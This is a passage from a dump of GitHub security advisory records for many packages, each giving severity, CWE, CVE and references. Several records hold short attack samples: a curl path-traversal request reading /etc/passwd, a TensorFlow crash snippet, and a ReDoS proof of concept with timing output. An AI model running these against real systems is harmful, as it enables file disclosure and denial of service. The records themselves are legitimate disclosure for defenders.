{'https://nvd.nist.gov/vuln/detail/CVE-2022-0938', 'https://github.com/advisories/GHSA-mw75-qvfr-hpmr', 'https://huntr.dev/bounties/3eb5a8f9-24e3-4eae-a212-070b2fbc237e', 'https://github.com/star7th/showdoc/commit/830c89a4c2c5fd0dd491422bf8e97b4eb5713f55'}
null
GHSA
GHSA-mpq4-rjj8-fjph
Uncontrolled Resource Consumption in github.com/google/fscrypt
fscrypt through v0.3.2 creates a world-writable directory by default when setting up a filesystem, allowing unprivileged users to exhaust filesystem space. We recommend upgrading to fscrypt 0.3.3 or above and adjusting the permissions on existing fscrypt metadata directories where applicable.
{'CVE-2022-25326'}
2022-03-07T13:42:34Z
2022-02-26T00:00:44Z
MODERATE
5.5
{'CWE-400'}
{'https://github.com/google/fscrypt/pull/346', 'https://github.com/advisories/GHSA-mpq4-rjj8-fjph', 'https://nvd.nist.gov/vuln/detail/CVE-2022-25326'}
null
GHSA
GHSA-wg9m-gw3h-hg83
Injection in field_test
The field_test gem 0.3.0 for Ruby has unvalidated input. A method call that is expected to return a value from a certain set of inputs can be made to return any input, which can be dangerous depending on how applications use it. If an application treats arbitrary variants as trusted, this can lead to a variety of potential vulnerabilities like SQL injection or cross-site scripting (XSS).
{'CVE-2019-13146'}
2021-05-11T14:27:51Z
2019-07-16T00:42:27Z
MODERATE
5.3
{'CWE-74'}
{'https://github.com/advisories/GHSA-wg9m-gw3h-hg83', 'http://www.securityfocus.com/bid/109114', 'https://rubygems.org/gems/field_test', 'https://github.com/ankane/field_test/issues/17', 'https://nvd.nist.gov/vuln/detail/CVE-2019-13146'}
null
GHSA
GHSA-v2p6-4mp7-3r9v
Regular Expression Denial of Service in underscore.string
Versions of `underscore.string` prior to *3.3.5* are vulnerable to Regular Expression Denial of Service (ReDoS). The function `unescapeHTML` is vulnerable to ReDoS due to an overly-broad regex. The slowdown is approximately 2s for 50,000 characters but grows exponentially with larger inputs. ## Recommendation Upgrade to version 3.3.5 or higher.
null
2021-08-16T23:29:45Z
2019-06-14T16:26:22Z
MODERATE
0
{'CWE-400'}
{'https://github.com/advisories/GHSA-v2p6-4mp7-3r9v', 'https://github.com/epeli/underscore.string/pull/517', 'https://www.npmjs.com/advisories/745', 'https://github.com/epeli/underscore.string/commit/f486cd684c94c12db48b45d52b1472a1b9661029', 'https://github.com/epeli/underscore.string/issues/510'}
null
GHSA
GHSA-ph32-23p8-9rw5
Improper Input Validation in network-manager
network-manager through 1.0.2 allows remote attackers to execute arbitrary commands via the "execSync()" argument.
{'CVE-2019-10786'}
2021-07-28T18:30:27Z
2021-04-13T15:17:45Z
CRITICAL
9.8
{'CWE-20', 'CWE-78'}
{'https://github.com/advisories/GHSA-ph32-23p8-9rw5', 'https://snyk.io/vuln/SNYK-JS-NETWORKMANAGER-544035', 'https://nvd.nist.gov/vuln/detail/CVE-2019-10786'}
null
GHSA
GHSA-3p9j-442x-hjp7
Business Logic Errors in microweber
microweber prior to 1.2.11 allows multiple uses of a single-use coupon.
{'CVE-2022-0689'}
2022-02-26T01:15:36Z
2022-02-20T00:00:31Z
MODERATE
5.3
null
{'https://github.com/advisories/GHSA-3p9j-442x-hjp7', 'https://github.com/microweber/microweber/commit/c3c25ae6c421bb4a65df9e0035edcc2f75594a04', 'https://huntr.dev/bounties/fa5dbbd3-97fe-41a9-8797-2e54d9a9c649', 'https://nvd.nist.gov/vuln/detail/CVE-2022-0689'}
null
GHSA
GHSA-6pc9-xqrg-wfqw
Exposure of Sensitive information in httpie
httpie is a modern, user-friendly command-line HTTP client for the API era. Prior to version 3.1.0, all cookies saved to session storage are supercookies. At this time, there is no known workaround. Users are recommended to update to version 3.1.0.
{'CVE-2022-0430'}
2022-04-05T18:50:32Z
2022-03-16T00:00:47Z
LOW
2.4
{'CWE-200'}
{'https://nvd.nist.gov/vuln/detail/CVE-2022-0430', 'https://github.com/advisories/GHSA-6pc9-xqrg-wfqw', 'https://huntr.dev/bounties/dafb2e4f-c6b6-4768-8ef5-b396cd6a801f', 'https://github.com/pypa/advisory-database/tree/main/vulns/httpie/PYSEC-2022-167.yaml', 'https://github.com/httpie/httpie/commit/65ab7d5caaaf2f95e61f9dd65441801c2ddee38b'}
null
GHSA
GHSA-xpwj-7v8q-mcgj
Static imports inside dynamically imported modules do not adhere to permission checks
### Impact Modules that are dynamically imported through `import()` or `new Worker` might have been able to bypass network and file system permission checks when statically importing other modules. In Deno 1.5.x and 1.6.x only programs dynamically importing (especially transitively) untrusted code are affected. In Deno 1.7.x all programs importing (especially transitively) untrusted code are affected. In effect an attacker in control of a (possibly remote) module in a programs module graph has been able to, **irrespective of permissions**: 1. initiate GET requests to arbitrary URLs on the internet (including LAN) and possibly read (parts of) the contents of these resources. 2. check for existence of arbitrary paths on the file system, and possibly read (parts of) the contents of these files. In Deno 1.5.x (October 27th, 2020) and Deno 1.6.x (December 8th, 2020) the attacker module had to have been granted permissions to load dynamically through the network / fs read permission. Since Deno 1.7.x (January 19th, 2021) this vulnerability was able to be exploited in a fully sandboxed isolate (without any permissions). This vulnerability was not present in releases prior to 1.5.0. Arbitrary non-GET requests, control over request headers, or file system writes are not possible through this vulnerability. Users of the `deno_core`, `deno_runtime`, or other `deno_*` crates are not affected. This is a Deno CLI only vulnerability. We are relatively confident this was not abused in the wild, as by default Deno prints out a green "Download" message when remote imports are downloaded, and this would have caused suspicion if it occurred in the middle of a programs execution. This message can be silenced with the `--quiet` flag. ### Patches The vulnerability has been patched in Deno release 1.10.2. You can upgrade to the latest Deno version by running the `deno upgrade` command. The release is available through all official download channels. ### Workarounds There is no workaround for this issue. ### For more information If you have any questions or comments about this advisory: * Open an issue on [the issue tracker](https://github.com/denoland/deno) * Discuss on [Discord](https://discord.gg/deno)
{'CVE-2021-32619'}
2022-04-19T19:02:57Z
2021-09-23T23:18:03Z
CRITICAL
9.8
{'CWE-285'}
{'https://github.com/denoland/deno/security/advisories/GHSA-xpwj-7v8q-mcgj', 'https://github.com/advisories/GHSA-xpwj-7v8q-mcgj', 'https://nvd.nist.gov/vuln/detail/CVE-2021-32619'}
null
GHSA
GHSA-vw5m-qw2r-m923
Use of Uninitialized Resource in messagepack-rs.
An issue was discovered in the messagepack-rs crate through 2021-01-26 for Rust. deserialize_binary may read from uninitialized memory locations.
{'CVE-2021-45690'}
2022-01-07T17:13:28Z
2022-01-06T22:11:46Z
CRITICAL
9.8
{'CWE-908'}
{'https://nvd.nist.gov/vuln/detail/CVE-2021-45690', 'https://raw.githubusercontent.com/rustsec/advisory-db/main/crates/messagepack-rs/RUSTSEC-2021-0092.md', 'https://rustsec.org/advisories/RUSTSEC-2021-0092.html', 'https://github.com/advisories/GHSA-vw5m-qw2r-m923'}
null
GHSA
GHSA-7c9w-qmrq-ff8r
Path Traversal in http-live-simulator
Versions of `http-live-simulator` prior to 1.0.7 are vulnerable to Path Traversal. Due to insufficient input sanitization, attackers can access server files by using relative paths. For example: `curl --path-as-is http://localhost:8080//../../../../etc/passwd`. ## Recommendation Upgrade to version 1.0.7
{'CVE-2018-16479'}
2021-01-08T19:16:25Z
2019-02-07T18:14:21Z
HIGH
0
{'CWE-22'}
{'https://hackerone.com/reports/411405', 'https://www.npmjs.com/advisories/772', 'https://github.com/nodejs/security-wg/blob/master/vuln/npm/486.json', 'https://nvd.nist.gov/vuln/detail/CVE-2018-16479', 'https://github.com/advisories/GHSA-7c9w-qmrq-ff8r'}
null
GHSA
GHSA-q4hg-rmq2-52q9
Improper Locking in Apache Tomcat
The fix for CVE-2019-0199 was incomplete and did not address HTTP/2 connection window exhaustion on write in Apache Tomcat versions 9.0.0.M1 to 9.0.19 and 8.5.0 to 8.5.40 . By not sending WINDOW_UPDATE messages for the connection window (stream 0) clients were able to cause server-side threads to block eventually leading to thread exhaustion and a DoS.
{'CVE-2019-10072'}
2021-06-15T17:05:52Z
2019-06-26T01:09:40Z
MODERATE
7.5
{'CWE-667'}
{'https://www.debian.org/security/2020/dsa-4680', 'https://lists.apache.org/thread.html/r6ccee4e849bc77df0840c7f853f6bd09d426f6741247da2b7429d5d9@%3Cdev.tomcat.apache.org%3E', 'https://lists.apache.org/thread.html/r48c1444845fe15a823e1374674bfc297d5008a5453788099ea14caf0@%3Cdev.tomcat.apache.org%3E', 'https://support.f5.com/csp/article/K17321505', 'https://www.oracle.com/security-alerts/cpujan2020.html', 'https://www.oracle.com/security-alerts/cpuApr2021.html', 'https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html', 'http://www.securityfocus.com/bid/108874', 'https://usn.ubuntu.com/4128-2/', 'https://security.netapp.com/advisory/ntap-20190625-0002/', 'http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00013.html', 'https://usn.ubuntu.com/4128-1/', 'https://lists.apache.org/thread.html/df1a2c1b87c8a6c500ecdbbaf134c7f1491c8d79d98b48c6b9f0fa6a@%3Cannounce.tomcat.apache.org%3E', 'https://github.com/advisories/GHSA-q4hg-rmq2-52q9', 'https://nvd.nist.gov/vuln/detail/CVE-2019-10072', 'https://www.synology.com/security/advisory/Synology_SA_19_29', 'https://access.redhat.com/errata/RHSA-2019:3929', 'https://lists.apache.org/thread.html/raba0fabaf4d56d4325ab2aca8814f0b30a237ab83d8106b115ee279a@%3Cdev.tomcat.apache.org%3E', 'https://lists.apache.org/thread.html/r3bbb800a816d0a51eccc5a228c58736960a9fffafa581a225834d97d@%3Cdev.tomcat.apache.org%3E', 'https://www.oracle.com/security-alerts/cpuoct2020.html', 'https://access.redhat.com/errata/RHSA-2019:3931', 'https://www.oracle.com/security-alerts/cpuapr2020.html'}
null
GHSA
GHSA-7phr-5m9x-rw9q
Directory traversal in fast-http
This affects all versions of package fast-http. There is no path sanitization in the path provided at fs.readFile in index.js.
{'CVE-2020-7687'}
2021-09-22T21:15:29Z
2020-07-27T16:02:57Z
HIGH
7.5
{'CWE-22'}
{'https://github.com/advisories/GHSA-7phr-5m9x-rw9q', 'https://snyk.io/vuln/SNYK-JS-FASTHTTP-572892', 'https://nvd.nist.gov/vuln/detail/CVE-2020-7687'}
null
GHSA
GHSA-qphc-hf5q-v8fc
Open Redirect in actionpack
Specially crafted "X-Forwarded-Host" headers in combination with certain "allowed host" formats can cause the Host Authorization middleware in Action Pack to redirect users to a malicious website. Impacted applications will have allowed hosts with a leading dot. For example, configuration files that look like this: ``` config.hosts << '.EXAMPLE.com' ``` When an allowed host contains a leading dot, a specially crafted Host header can be used to redirect to a malicious website. This vulnerability is similar to CVE-2021-22881 and CVE-2021-22942. Releases -------- The fixed releases are available at the normal locations. Patches ------- To aid users who aren't able to upgrade immediately we have provided patches for the two supported release series. They are in git-am format and consist of a single changeset. * 6-0-host-authorzation-open-redirect.patch - Patch for 6.0 series * 6-1-host-authorzation-open-redirect.patch - Patch for 6.1 series * 7-0-host-authorzation-open-redirect.patch - Patch for 7.0 series Please note that only the 6.1.Z, 6.0.Z, and 5.2.Z series are supported at present. Users of earlier unsupported releases are advised to upgrade as soon as possible as we cannot guarantee the continued availability of security fixes for unsupported releases.
{'CVE-2021-44528'}
2022-04-27T22:24:24Z
2021-12-14T21:19:08Z
MODERATE
6.1
{'CWE-601'}
{'https://nvd.nist.gov/vuln/detail/CVE-2021-44528', 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/actionpack/CVE-2021-44528.yml', 'https://groups.google.com/g/ruby-security-ann/c/vG9gz3nk1pM/m/7-NU4MNrDAAJ?utm_medium=email&utm_source=footer', 'https://github.com/advisories/GHSA-qphc-hf5q-v8fc', 'https://github.com/rails/rails/commit/aecba3c301b80e9d5a63c30ea1b287bceaf2c107', 'https://github.com/rails/rails/commit/0fccfb9a3097a9c4260c791f1a40b128517e7815', 'https://github.com/rails/rails/blob/v6.1.4.2/actionpack/CHANGELOG.md#rails-6142-december-14-2021', 'https://groups.google.com/g/ruby-security-ann/c/vG9gz3nk1pM/m/7-NU4MNrDAAJ'}
null
GHSA
GHSA-2v7q-2xqx-f4q5
Potential SQL Injection in sequelize
Affected versions of `sequelize` are vulnerable to SQL Injection when user input is passed into `findOne` or into a statement such as `where: "user input"`. ## Recommendation Update to version 3.0.0 or later. Version 3.0.0 will introduce a number of breaking changes. Thankfully, the project authors have provided a 2.x -> 3.x [upgrade guide](https://github.com/sequelize/sequelize/wiki/Upgrade-from-2.0-to-3.0) to ease this transition. If upgrading is not an option, it is also possible to mitigate this by ensuring that all uses of `where: "input"` and `findOne("input")` are properly sanitized, such as by the use of a wrapper function.
{'CVE-2016-10553'}
2021-01-08T20:06:22Z
2019-02-18T23:54:32Z
HIGH
0
{'CWE-89'}
{'https://github.com/sequelize/sequelize/blob/master/changelog.md#300', 'https://nodesecurity.io/advisories/109', 'https://nvd.nist.gov/vuln/detail/CVE-2016-10553', 'https://github.com/advisories/GHSA-2v7q-2xqx-f4q5', 'https://www.npmjs.com/advisories/109'}
null
GHSA
GHSA-3qxp-qjq7-w4hf
CHECK-fail in tf.raw_ops.EncodePng
### Impact An attacker can trigger a `CHECK` fail in PNG encoding by providing an empty input tensor as the pixel data: ```python import tensorflow as tf image = tf.zeros([0, 0, 3]) image = tf.cast(image, dtype=tf.uint8) tf.raw_ops.EncodePng(image=image) ``` This is because the [implementation](https://github.com/tensorflow/tensorflow/blob/e312e0791ce486a80c9d23110841525c6f7c3289/tensorflow/core/kernels/image/encode_png_op.cc#L57-L60) only validates that the total number of pixels in the image does not overflow. Thus, an attacker can send an empty matrix for encoding. However, if the tensor is empty, then the associated buffer is `nullptr`. Hence, when [calling `png::WriteImageToBuffer`](https://github.com/tensorflow/tensorflow/blob/e312e0791ce486a80c9d23110841525c6f7c3289/tensorflow/core/kernels/image/encode_png_op.cc#L79-L93), the first argument (i.e., `image.flat<T>().data()`) is `NULL`. This then triggers the `CHECK_NOTNULL` in the [first line of `png::WriteImageToBuffer`](https://github.com/tensorflow/tensorflow/blob/e312e0791ce486a80c9d23110841525c6f7c3289/tensorflow/core/lib/png/png_io.cc#L345-L349). ```cc template <typename T> bool WriteImageToBuffer( const void* image, int width, int height, int row_bytes, int num_channels, int channel_bits, int compression, T* png_string, const std::vector<std::pair<std::string, std::string> >* metadata) { CHECK_NOTNULL(image); ... } ``` Since `image` is null, this results in `abort` being called after printing the stacktrace. Effectively, this allows an attacker to mount a denial of service attack. ### Patches We have patched the issue in GitHub commit [26eb323554ffccd173e8a79a8c05c15b685ae4d1](https://github.com/tensorflow/tensorflow/commit/26eb323554ffccd173e8a79a8c05c15b685ae4d1). The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. ### For more information Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. ### Attribution This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team.
{'CVE-2021-29531'}
2021-05-21T14:22:13Z
2021-05-21T14:22:13Z
LOW
2.5
{'CWE-754'}
{'https://nvd.nist.gov/vuln/detail/CVE-2021-29531', 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-3qxp-qjq7-w4hf', 'https://github.com/tensorflow/tensorflow/commit/26eb323554ffccd173e8a79a8c05c15b685ae4d1', 'https://github.com/advisories/GHSA-3qxp-qjq7-w4hf'}
null
GHSA
GHSA-pp2h-95hm-hv9r
Improper Neutralization of Formula Elements in a CSV File in pimcore/pimcore
### Impact Data Object CSV import allows formular injection. ### Patches Problem is patched in 10.1.1 ### Workarounds Apply https://github.com/pimcore/pimcore/pull/9992.patch ### References https://cwe.mitre.org/data/definitions/1236.html
{'CVE-2021-37702'}
2021-08-30T16:13:13Z
2021-08-30T16:13:13Z
MODERATE
0
{'CWE-1236'}
{'https://nvd.nist.gov/vuln/detail/CVE-2021-37702', 'https://github.com/pimcore/pimcore/pull/9992', 'https://github.com/advisories/GHSA-pp2h-95hm-hv9r', 'https://github.com/pimcore/pimcore/security/advisories/GHSA-pp2h-95hm-hv9r'}
null
GHSA
GHSA-5679-7qrc-5m7j
IDOR can reveal execution data and logs to unauthorized user in Rundeck
### Impact Authenticated users can craft a request that reveals Execution data and logs and Job details that they are not authorized to see. > Depending on the configuration and the way that Rundeck is used, this could result in anything between a high severity risk, or a very low risk. If access is tightly restricted and all users on the system have access to all projects, this is not really much of an issue. If access is wider and allows login for users that do not have access to any projects, or project access is restricted, there is a larger issue. If access is meant to be restricted and secrets, sensitive data, or intellectual property are exposed in Rundeck execution output and job data, the risk becomes much higher. ### Details An authenticated user could craft a request to: * View Executions and download execution logs without access to `read` or `view` the associated Job, or ad-hoc resource. * Get the list of running executions in a project, without Event `read` access, if they have `read` access to view the project. * View the Options definitions of a Job without access to view the Job. * View the definition of a workflow step of a Job without access to view the Job. * View the SCM diff of a modified Job definition if SCM is enabled, without Project `export` access level. * View the New User Profile Form for a different username, without User `admin` access. Note: they would not be allowed to create or modify a profile for a different user, or reveal any user profile information for a different user. Some authenticated API requests were not correctly checking appropriate authorization levels: * The list of running Executions would be sent without `read` access to Events. * The Plugin Input Parameters for a SCM plugin would be sent without authorization for project `import`,`scm_import`,`export`, or `scm_export` actions. * Job Retry action could retry an execution without `read` or `view` access to the Execution, which would reveal the Execution's option values. (`run` access to the Job was still required). ### Patches Upgrade to Rundeck version 3.2.6 ### Workarounds None ### References [3.2.6 Release Notes](https://docs.rundeck.com/docs/history/3_2_x/version-3.2.6.html) ### Report If you have any questions or comments about this advisory: * Email us at [security@rundeck.com](mailto:security@rundeck.com) To report security issues to Rundeck please use the form at [http://rundeck.com/security](http://rundeck.com/security) Reporter: Justine Osborne of Apple Information Security
{'CVE-2020-11009'}
2022-04-19T19:02:25Z
2020-04-29T16:31:12Z
MODERATE
6.5
{'CWE-200', 'CWE-639'}
{'https://docs.rundeck.com/docs/history/3_2_x/version-3.2.6.html', 'https://github.com/rundeck/rundeck/security/advisories/GHSA-5679-7qrc-5m7j', 'https://github.com/advisories/GHSA-5679-7qrc-5m7j', 'https://nvd.nist.gov/vuln/detail/CVE-2020-11009'}
null
GHSA
GHSA-xwx6-vmj4-5rv8
Denial of service via deserialization attack in nifi
A vulnerability found in Apache NIFI before 1.5.0-RC1. Attacker can perform XXE attacks through JAXB.
{'CVE-2017-15703'}
2021-08-18T22:04:42Z
2019-10-25T19:42:50Z
MODERATE
5
{'CWE-502'}
{'https://github.com/advisories/GHSA-xwx6-vmj4-5rv8', 'https://github.com/apache/nifi/commit/9e2c7be7d3c6a380c5f61074d9a5a690b617c3dc'}
null
GHSA
GHSA-6g47-63mv-qpgh
Prototype Pollution in dotty
This affects the package dotty before 0.1.2. A type confusion vulnerability can lead to a bypass of CVE-2021-25912 when the user-provided keys used in the path parameter are arrays.
{'CVE-2021-23624'}
2021-11-08T17:55:48Z
2021-11-08T17:55:48Z
MODERATE
5.6
{'CWE-843', 'CWE-1321'}
{'https://github.com/advisories/GHSA-6g47-63mv-qpgh', 'https://snyk.io/vuln/SNYK-JS-DOTTY-1577292', 'https://nvd.nist.gov/vuln/detail/CVE-2021-23624', 'https://github.com/deoxxa/dotty/commit/88f61860dcc274a07a263c32cbe9d44c24ef02d7'}
null
GHSA
GHSA-7wq4-89xx-g62j
Password exposure in ShenYu
The HTTP response will disclose the user password. This issue affected Apache ShenYu 2.4.0 and 2.4.1.
{'CVE-2022-23223'}
2022-02-02T16:15:03Z
2022-01-28T22:13:57Z
HIGH
7.5
{'CWE-522'}
{'https://nvd.nist.gov/vuln/detail/CVE-2022-23223', 'http://www.openwall.com/lists/oss-security/2022/01/26/4', 'https://github.com/apache/incubator-shenyu/releases/tag/v2.4.2', 'http://www.openwall.com/lists/oss-security/2022/01/25/7', 'https://github.com/advisories/GHSA-7wq4-89xx-g62j', 'https://lists.apache.org/thread/q2gg6ny6lpkph7nkrvjzqdvqpm805v8s'}
null
GHSA
GHSA-2p6p-v69p-9mm9
XSS in login form
In the Alkacon OpenCms Apollo Template 10.5.4 and 10.5.5, there is XSS in the Login form.
{'CVE-2019-13235'}
2021-08-18T22:26:43Z
2019-11-12T22:58:16Z
MODERATE
6.1
{'CWE-79'}
{'https://github.com/alkacon/apollo-template/commits/branch_10_5_x', 'https://github.com/advisories/GHSA-2p6p-v69p-9mm9', 'https://aetsu.github.io/OpenCms', 'https://nvd.nist.gov/vuln/detail/CVE-2019-13235', 'http://packetstormsecurity.com/files/154298/Alkacon-OpenCMS-10.5.x-Cross-Site-Scripting.html'}
null
GHSA
GHSA-9rgv-h7x4-qw8g
Moderate severity vulnerability that affects org.eclipse.jetty:jetty-server
In Eclipse Jetty Server, all 9.x versions, on webapps deployed using default Error Handling, when an intentionally bad query arrives that doesn't match a dynamic url-pattern, and is eventually handled by the DefaultServlet's static file serving, the bad characters can trigger a java.nio.file.InvalidPathException which includes the full path to the base resource directory that the DefaultServlet and/or webapp is using. If this InvalidPathException is then handled by the default Error Handler, the InvalidPathException message is included in the error response, revealing the full server path to the requesting system.
{'CVE-2018-12536'}
2021-06-10T23:55:07Z
2018-10-19T16:15:56Z
MODERATE
5.3
{'CWE-209'}
{'https://github.com/advisories/GHSA-9rgv-h7x4-qw8g', 'https://lists.apache.org/thread.html/053d9ce4d579b02203db18545fee5e33f35f2932885459b74d1e4272@%3Cissues.activemq.apache.org%3E', 'https://www.oracle.com/security-alerts/cpuoct2020.html', 'https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbst03953en_us', 'https://lists.debian.org/debian-lts-announce/2021/05/msg00016.html', 'https://security.netapp.com/advisory/ntap-20181014-0001/', 'http://www.securitytracker.com/id/1041194', 'https://bugs.eclipse.org/bugs/show_bug.cgi?id=535670', 'https://nvd.nist.gov/vuln/detail/CVE-2018-12536', 'https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html'}
null
GHSA
GHSA-vpgw-ffh3-648h
Prototype Pollution in fullpage.js
fullPage utils are available to developers using window.fp_utils. They can use these utils for their own use-case (other than fullPage) as well. However, one of the utils deepExtend is vulnerable to Prototype Pollution vulnerability. Javascript is "prototype" language which means when a new "object" is created, it carries the predefined properties and methods of an "object" with itself like toString, constructor etc. By using prototype-pollution vulnerability, an attacker can overwrite/create the property of that "object" type. If the victim developer has used that property anywhere in the code, then it will have severe effect on the application.
{'CVE-2022-1295'}
2022-04-22T20:20:56Z
2022-04-12T00:00:38Z
HIGH
7.3
{'CWE-1321'}
{'https://github.com/alvarotrigo/fullpage.js/commit/bf62492a22e5d296e63c3ed918a42fc5645a0d48', 'https://huntr.dev/bounties/3b9d450c-24ac-4037-b04d-4d4dafbf593a', 'https://nvd.nist.gov/vuln/detail/CVE-2022-1295', 'https://github.com/advisories/GHSA-vpgw-ffh3-648h'}
null
GHSA
GHSA-hwvv-438r-mhvj
Exposure of Sensitive Information to an Unauthorized Actor
A document disclosure flaw was found in Elasticsearch versions after 7.6.0 and before 7.11.0 when Document or Field Level Security is used. Get requests do not properly apply security permissions when executing a query against a recently updated document. This affects documents that have been updated and not yet refreshed in the index. This could result in the search disclosing the existence of documents and fields the attacker should not be able to view.
{'CVE-2021-22134'}
2022-04-22T16:50:20Z
2021-03-18T19:23:57Z
MODERATE
4.3
{'CWE-200'}
{'https://github.com/advisories/GHSA-hwvv-438r-mhvj', 'https://www.oracle.com/security-alerts/cpuapr2022.html', 'https://discuss.elastic.co/t/elastic-stack-7-11-0-security-update/265835', 'https://security.netapp.com/advisory/ntap-20210430-0006/', 'https://nvd.nist.gov/vuln/detail/CVE-2021-22134'}
null
GHSA
GHSA-gppw-3h6h-v6q2
Data race in internment
An issue was discovered in the internment crate before 0.4.2 for Rust. There is a data race that can cause memory corruption because of the unconditional implementation of Sync for Intern<T>.
{'CVE-2021-28037'}
2021-08-25T20:52:08Z
2021-08-25T20:52:08Z
CRITICAL
9.8
{'CWE-362'}
{'https://rustsec.org/advisories/RUSTSEC-2021-0036.html', 'https://nvd.nist.gov/vuln/detail/CVE-2021-28037', 'https://github.com/droundy/internment/issues/20', 'https://github.com/advisories/GHSA-gppw-3h6h-v6q2'}
null
GHSA
GHSA-ccjp-w723-2jf2
Moderate severity vulnerability that affects org.apache.tika:tika-core
Apache Tika server (aka tika-server) in Apache Tika 1.9 might allow remote attackers to read arbitrary files via the HTTP fileUrl header.
{'CVE-2015-3271'}
2021-09-08T22:00:50Z
2018-10-17T15:44:10Z
MODERATE
5.3
{'CWE-200'}
{'https://github.com/advisories/GHSA-ccjp-w723-2jf2', 'http://www.securityfocus.com/bid/95020', 'http://www.openwall.com/lists/oss-security/2015/08/13/5', 'https://nvd.nist.gov/vuln/detail/CVE-2015-3271', 'https://lists.apache.org/thread.html/d2b3e7afb0251fac95fdee9817423cbc91e3d99a848c25a51d91c1e8@1439485507@%3Cdev.tika.apache.org%3E'}
null
GHSA
GHSA-49mg-94fc-2fx6
Command Injection in npm-git-publish
All versions of `npm-git-publish` are vulnerable to Command Injection. The package fails to sanitize input and passes it directly to an `execSync` call, which may allow attackers to execute arbitrary code in the system. The `publish` function is vulnerable through the `gitRemoteUrl` variable. ## Recommendation No fix is currently available. Consider using an alternative package until a fix is made available.
null
2021-10-04T20:47:52Z
2020-09-04T17:32:49Z
CRITICAL
0
{'CWE-77'}
{'https://hackerone.com/reports/730121', 'https://www.npmjs.com/advisories/1458', 'https://github.com/advisories/GHSA-49mg-94fc-2fx6'}
null
GHSA
GHSA-8qx4-r7fx-xc4v
Malicious Package in requst
All versions of `requst` typosquatted a popular package of similar name and tracked users who had installed the incorrect package. The package uploaded information to a remote server including: name of the downloaded package, name of the intended package, the Node version and whether the process was running as sudo. There is no further compromise. ## Recommendation Remove the package from your dependencies and always ensure package names are typed correctly upon installation.
null
2021-10-01T14:08:31Z
2020-09-11T21:08:19Z
CRITICAL
9.8
{'CWE-506'}
{'https://github.com/advisories/GHSA-8qx4-r7fx-xc4v', 'https://www.npmjs.com/advisories/865'}
null
GHSA
GHSA-6354-6mhv-mvv5
Regular Expression Denial of Service in jadedown
The `jadedown` package is affected by a regular expression denial of service vulnerability when certain types of user input are passed in. ### Proof of concept ``` var jadedown = require('jadedown'); var genstr = function (len, chr) { var result = ""; for (i=0; i<=len; i++) { result = result + chr; } return result; } for (i=1;i<=10000000;i=i+1) { console.log("COUNT: " + i); var str = genstr(i, 'f') + genstr(i, '#') + '{'; console.log("LENGTH: " + str.length); var start = process.hrtime(); jadedown(str) var end = process.hrtime(start); console.log(end); } ``` Results demonstrating blocking for 5 seconds using only 48 characters. ``` $ node jadedown.js COUNT: 1 LENGTH: 6 [ 0, 4014065 ] COUNT: 4 LENGTH: 12 [ 0, 503507 ] COUNT: 7 LENGTH: 18 [ 0, 325225 ] COUNT: 10 LENGTH: 24 [ 0, 1632684 ] COUNT: 13 LENGTH: 30 [ 0, 7541230 ] COUNT: 16 LENGTH: 36 [ 0, 80889495 ] COUNT: 19 LENGTH: 42 [ 0, 636009936 ] COUNT: 22 LENGTH: 48 [ 5, 820586760 ] ``` # Timeline - October 24, 2015 - Vulnerability Identified - October 24, 2015 - Maintainers Notified - October 25, 2015 - Response from Maintainers with intent to fix - January 5, 2016 - Advisory Published - January 11, 2016 - CVE Requested ## Recommendation This package is not actively maintained, and has not seen an update since 2011. The package also provides unique functionality in the form of a templating language that is not available elsewhere. If this package is used to process user input, the best available mitigation is to refactor the dependent application to not make use of this module.
{'CVE-2016-10520'}
2021-01-08T19:47:38Z
2019-02-18T23:38:38Z
LOW
0
{'CWE-400'}
{'https://www.npmjs.com/advisories/52', 'https://nodesecurity.io/advisories/52', 'https://nvd.nist.gov/vuln/detail/CVE-2016-10520', 'https://github.com/advisories/GHSA-6354-6mhv-mvv5'}
null
GHSA
GHSA-87mg-h5r3-hw88
Cross-Site Scripting in bootbox
All version of `bootbox` are vulnerable to Cross-Site Scripting. The package does not sanitize user input in the provided dialog boxes, allowing attackers to inject HTML code and execute arbitrary JavaScript. ## Recommendation Sanitize user input being passed to `bootbox` or consider using an alternative package.
null
2021-09-16T21:01:14Z
2019-05-30T17:23:28Z
MODERATE
0
{'CWE-64', 'CWE-79'}
{'https://github.com/advisories/GHSA-87mg-h5r3-hw88', 'https://hackerone.com/reports/508446', 'https://www.npmjs.com/advisories/882', 'https://github.com/makeusabrew/bootbox/issues/661'}
null
GHSA
GHSA-v83p-xwm9-v4g8
Injection in Apache Archiva
Apache Archiva login service before 2.2.5 is vulnerable to LDAP injection. A attacker is able to retrieve user attribute data from the connected LDAP server by providing special values to the login form. With certain characters it is possible to modify the LDAP filter used to query the LDAP users. By measuring the response time for the login request, arbitrary attribute data can be retrieved from LDAP user objects.
{'CVE-2020-9495'}
2022-02-10T23:06:22Z
2022-02-10T23:06:22Z
MODERATE
5.3
{'CWE-74'}
{'http://www.openwall.com/lists/oss-security/2020/06/19/1', 'https://github.com/advisories/GHSA-v83p-xwm9-v4g8', 'https://lists.apache.org/thread.html/r576eaabe3f772c045ec832a0200252494a2ce3f188f59450dd8f9b6d@%3Cannounce.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2020-9495', 'https://lists.apache.org/thread.html/r576eaabe3f772c045ec832a0200252494a2ce3f188f59450dd8f9b6d@%3Cusers.archiva.apache.org%3E', 'https://lists.apache.org/thread.html/r576eaabe3f772c045ec832a0200252494a2ce3f188f59450dd8f9b6d@%3Cdev.archiva.apache.org%3E', 'http://archiva.apache.org/security.html#CVE-2020-9495', 'https://lists.apache.org/thread.html/r7ae580f700ade57b00641a70a5c639a3ba576893bbf7f9fd93bc491d@%3Cusers.maven.apache.org%3E'}
null
GHSA
GHSA-8gw6-w5rw-4g5c
Incorrect Default Permissions in Apache JSPWiki
